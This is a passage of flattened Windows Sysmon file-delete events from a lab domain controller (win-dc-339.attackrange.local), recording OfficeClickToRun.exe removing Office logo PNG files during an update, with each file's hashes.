Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.scale-140.pngMD5=F4EAB2E3FB47FA94FC020529E97081B0,SHA256=FBD2B50989A571B331437860F946A364BED69739A0B19348C28A320A356CA6C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.scale-100.pngMD5=1DF18BFB5B09B1705B87DD8B2321FAEF,SHA256=81ADAC3FB5546F2ADB277949F79C6551176577DE46324EB234EFF75FD9AE701D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.contrast-white_scale-80.pngMD5=12BBC88A965525B1EFC36FA7D42CA9F3,SHA256=2E78FD77B4EDF610AC7CAADB36D2B3959EC14CD461285F72324E124D0AD25A42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.contrast-white_scale-180.pngMD5=936DF3B66000D610CA3B468CCA3021D6,SHA256=F9EF35493602567E584DF68143D5ACAA36A141B5993B87D2EB5CF16D725DF03A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.contrast-white_scale-140.pngMD5=5F4867CC4934661492A52487F639AB94,SHA256=9C5D743096116390DB03307F5EAA662D92961048F9F822B1114C97D1EC806788,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.contrast-white_scale-100.pngMD5=7D24DC4F9FDA3377B140AE3E20F6ED0A,SHA256=6A6B24DEC0C761917F40888813843C04FCDA945906A265A86F624F9F836FAD69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.contrast-black_scale-80.pngMD5=F8C1B954E81A127352EC04FE6AB87E92,SHA256=1DEAFEEA6AE75FC2506671F80F5841C79EA892A350ACE4B7E06780027B564EA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.contrast-black_scale-180.pngMD5=931F2508277AE19BAB1D3B0700F77288,SHA256=275863160C9348C250B6C8906865BA367B56298F6306238F9A06D488E6F87660,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.contrast-black_scale-140.pngMD5=2FEB9632A852212EE33AC57F9B0B4D89,SHA256=18DB7ABC5E50F5594D12E76CB218138B4FDE0A43288F093036E5682216F57129,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.contrast-black_scale-100.pngMD5=00A6A3F442537761DC6478ED97BAF64B,SHA256=64B5248CDA7AC34F85C4314475856DAA7D195920003A0F3663952800CC038F2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.scale-80.pngMD5=CFC5A4016FCD730976FF61DDFFE62ADE,SHA256=477B997734696EF313386A3A03D584B47EB0989E711AD868361D00EB22C9830F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.scale-180.pngMD5=2D569B98230D27BF9E73A2B55C44B50E,SHA256=4098268DDE5D76F104A49ED33BEF1387E1DB70305B4E023469A1C169B94EB35E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.scale-140.pngMD5=8EE9094D77AE761BAC6D993558BB9003,SHA256=310CDA37CB498228C4EE3C86C6A142509F2856C89C5A830A13CA7913CF6DCAE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.scale-100.pngMD5=3BC1E3A441193CDF8BECB6D129C4A440,SHA256=34F031E8596CE72694FA9D7251A819BF3B67E56367C12E728336891CF78EBF3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.contrast-white_scale-80.pngMD5=457DC1CFB31EE0106E4D9279557D5BD4,SHA256=FFD5692C9CA4ED970A2E2EC84C18F0D56F1BA2273B2F1877BE192577B78F0C21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.contrast-white_scale-180.pngMD5=157AC8BC5D106B451058455218EF7D50,SHA256=E2DF2276F4DA206F05DC835F1654861BF8449EF887DD74092192316C023C01C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.contrast-white_scale-140.pngMD5=B748218E328472641DAD94B40ABD29FE,SHA256=0F5334393E4A39F56A7AB3CA13A67C02B11CC923959911236FE4F08DB50A6090,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.contrast-white_scale-100.pngMD5=827DAA82A219F613D7C57D38A45A2F32,SHA256=6ABA2539BD12A8913977ADDFAF93F50D0FF5765EC07EFD45A8DB6642A147F11B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.contrast-black_scale-80.pngMD5=3600F796B7B4C9FA360CF48AF3CB7165,SHA256=8DF5C4475F557A09A11FD832F12B9927BBA4CCF58930011DCE96C7E8DB09460C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.contrast-black_scale-180.pngMD5=D9A6E42D136C261868058A59FCCE7395,SHA256=C870C14D4903A547BBDB0018B2B8F5063E9A4E61E6E92E9D217D21FBD633A0DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.contrast-black_scale-140.pngMD5=869890D132C74B6E9386D8AE6B9B7927,SHA256=C453765272EF375BF5D86F2FEF0BB0BA79737128E651F5760915D6F54851EB0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogoSmall.contrast-black_scale-100.pngMD5=C2898AEDBFAC907B16BD0562B594389F,SHA256=1EFDD160E0E6F6F6C83CFC54A9488C070EB9772C29E191285DB893B7E29A85E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.scale-80.pngMD5=37E8C1DD32B0063A0FE5D9599986B9CE,SHA256=ECDF9F92556FE2CDDFF664CCA2F8CC97022DD951F80F8A3841C56B3A792A8487,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.scale-180.pngMD5=AA5C0F74D4F081BABC857B8DBA20EFB0,SHA256=7B3BD7B12A9B312E53AB376691B506DFC5E6706530C4937E4AD240083D669DF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.scale-140.pngMD5=B5185527994F6D7549A4A02BA5EC9E3E,SHA256=D01E3101DAE535D9FE791DD200C387F8D334DA311D8145E333642BA0FC3CBEC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.scale-100.pngMD5=225574D43994DD6B14230A97EB4B249C,SHA256=33B8F98D0925EFC375264B627E53DBA17F14E3874DCAB5746F62415DC63300DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.contrast-white_scale-80.pngMD5=6C42B5259B74396BBDEF4B3E70D703EF,SHA256=B39C865648A65D70B4451445CD5BEAEF579AD964635C68A4433407A62EA85008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.contrast-white_scale-180.pngMD5=42150177B8EE835AE387B868A98CBD27,SHA256=6C2FA00EF9E896F08AD9C8DF26FF3C14EF652FC3143C6F9525ECDAC04DA3CEED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.contrast-white_scale-140.pngMD5=3F1A90D9370FB08F83BD355891B28B3E,SHA256=DB8323C2CA0358C8EF0ED474590256C291E63DD376CBBD678B098123F9EBBC81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.contrast-white_scale-100.pngMD5=1E0E88203048A0EBF44A93A32BBB0CB2,SHA256=73CE25E12D5F0B72D747DE78402F35FA5199B91868EF788BF52C3F3D4BBAF544,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.contrast-black_scale-80.pngMD5=D87A3C3E80E3DF0B83408A2B939B5616,SHA256=5353A88039F3F9BDEE8BDCF0C68B02778581DDD643EA18C1709D541922376372,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.contrast-black_scale-180.pngMD5=082831260D1812FE140F760D4527E601,SHA256=29E0B22D36BD2616FD20082890788253B315ED8202BB438DF2FF8A4FAA516D11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.contrast-black_scale-140.pngMD5=7C6F2EDBDAB85BC42F88FD1B180BB707,SHA256=47EE3101FD57150E6E850D22F7181B1AD8353DA79031C938C89E85032292D0A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsAccessLogo.contrast-black_scale-100.pngMD5=B020E6BF16DB82B330FB59EB92D34805,SHA256=B5F40B2A6C020BEF77E3C421877C4ABBF7D7049C50A42F30AB70C16387919EF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.scale-80.pngMD5=B2F960AE0AC77388BFE45381FB55C662,SHA256=ADCCDC94797DB96ED5061F9FDFEBEFC1AF845929770B5BE1C4006100FE1D991D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.scale-180.pngMD5=728F41A33D79185311B3F80B446304E0,SHA256=138A9C3F8D6CCD0B2A46EA95189E1C41D950F598EF14F7A177D22BFFFF71FC56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.scale-140.pngMD5=C64605F46EDB1738D056A71F795E8D74,SHA256=43F59168B69B47A24D7F8CF8B6EF1E0EA5D4471C8ABCF41538212617B97B70EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.scale-100.pngMD5=C5D63376C30DDD4BBB08C5E99F95D18B,SHA256=DD78340C875DBEAD3E057384DE6EC6EE2562F2312AB36E3C2CFD0A1522107BB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-80.pngMD5=5A23770393C4B27CE78B548810FA1E6C,SHA256=88369DF2EFC03BC7A57DF4256AFD8906FFC55C98FF6633E3B94A43DD70C66C8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-180.pngMD5=804D91E73E2EB73FD00B72535B53E67F,SHA256=57F002F28FE16FB4B010D4853364AAC12DC98C2B16D25418260986AABA674981,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-140.pngMD5=7B4D5504770061FC0E2FA0B910D6C929,SHA256=28D557724ECA583ECACA85A6173CF1A5DE55BAAD40450D8F8ABA8081B7AEE9D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.pngMD5=91D8C38EF4FD1C5657C72701D80EA320,SHA256=0F6796FEB8051CBA97BA5AB12481496E654104B62E144351E25117B5EF70857F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-80.pngMD5=C40E184DE770BE3A88D8F81E00AEF44D,SHA256=EAA4D952485E509695B0D3035F5E0CE8B9FE76BC1006BBFA11AC6B18CAAA9583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-180.pngMD5=49DF5C324AD6CF0AB41363551F83D790,SHA256=3B8CCC0B7CB196AA71016B900A3A5B9BCCA38018D1305C57BA169CE726780CE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 